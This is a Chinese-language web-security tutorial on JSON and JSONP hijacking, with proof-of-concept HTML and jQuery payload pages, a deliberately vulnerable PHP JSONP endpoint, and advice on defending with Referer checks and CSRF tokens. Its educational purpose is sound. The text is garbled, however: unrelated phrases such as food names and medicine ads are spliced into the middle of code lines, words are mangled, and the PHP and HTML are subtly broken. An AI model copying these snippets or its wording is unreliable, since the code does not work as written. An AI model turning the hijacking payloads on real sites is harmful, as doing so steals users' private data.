详解JSON和JSONP劫持以及解决⽅法
json劫持
json劫持攻击⼜为”JSON Hijacking”,攻击过程有点类似于csrf,只不过csrf只管发送http请求,但是json-hijack的⽬的是获取敏感数据。
⼀些web应⽤会把⼀些敏感数据以json的形式返回到前端,如果仅仅通过cookie来判断请求是否合法,那么就可以利⽤类似csrf的⼿段,向⽬标服务器发送请求,以获得敏感数据。
⽐如下⾯的链接在已登录的情况下会返回json格式的⽤户信息:
攻击者可以在⾃⼰的虚假页⾯中,加⼊如下标签:
<script src="/urinfo"></script>
如果当前浏览器已经登录了,并且cookie未过期,然后访问了攻击者的虚假页⾯,那么该页⾯就可以拿到json形式的⽤户敏感信息,因为script标签会⾃动解析json数据,⽣成对应的js对象。然后再通过
饭后喝咖啡Object.prototype.__defineSetter__
这个函数来触发⾃⼰的恶意代码。
但是这个函数在当前的新版本chrome和firefox中都已经失效了。
jsonp劫持
web程序如果通过这种⽅式跨域之后,攻击者完全可以在⾃⼰的虚假页⾯中发起恶意的jsonp请求,这就引来了安全问题。⽐如:
<script>
function uUrInfo(v){
让孩子爱上学习alert(v.urname);
}
</script>
<script src="/urinfo?callback=uUrInfo"></script>
治疗心脏病的药
如果服务器端的urinfo接⼝⽀持jsonp,那就会使虚假页⾯成功执⾏uUrInfo函数,从⽽导致安全问题。
解决⽅法
其实json劫持和jsonp劫持属于CSRF( Cross-site request forgery 跨站请求伪造)的攻击范畴,所以解决的⽅法和解决csrf的⽅法⼀样。
1、验证 HTTP Referer 头信息;
2、在请求中添加 csrfToken 并在后端进⾏验证;
PS:JSONP劫持漏洞实例
getUr.php
盛开的睡莲<?php
header('Content-type: application/json');
$jsoncallback = htmlspecialchars($_REQUEST ['jsoncallback']);//获取回调函数名
//json数据
爱惜的反义词//$json_data = '["id","ur"]';
$json_data='({"id":"1","name":"Aaron"})';
echo $jsoncallback . "(" . $json_data . ")";//输出jsonp格式的数据
>
Payload利⽤:
客户端实现 callbackFunction 函数
<!DOCTYPE html>
<html>
<head>
<meta chart="utf-8">
大屿岛
<title>JSONP劫持测试</title>
</head>
<body>
<script type="text/javascript">
function callbackFunction(result)
{
alert(result.name);
}
</script>
<script type="text/javascript" src="127.0.0.1/test/getUr.php?jsoncallback=callbackFunction"></script>
</body>
茄子土豆泥</html>
jQuery 使⽤ JSONP
<!DOCTYPE html>
<html>
<head>
<meta chart="utf-8">
<title>JSONP劫持测试</title>
清除缓存快捷键<script src="cdn./libs/jquery/1.8.3/jquery.js"></script>
</head>
<body>
<div id="divCustomers"></div>
<script type="text/javascript">
$.getJSON("127.0.0.1/test/getUr.php?jsoncallback=?", function(getUrs){
alert(getUrs.name);
});
</script>
</body>
</html>
以上就是本⽂的全部内容,希望对⼤家的学习有所帮助,也希望⼤家多多⽀持。权声明:本⽂为博主原创⽂章,转载请附上博⽂链接!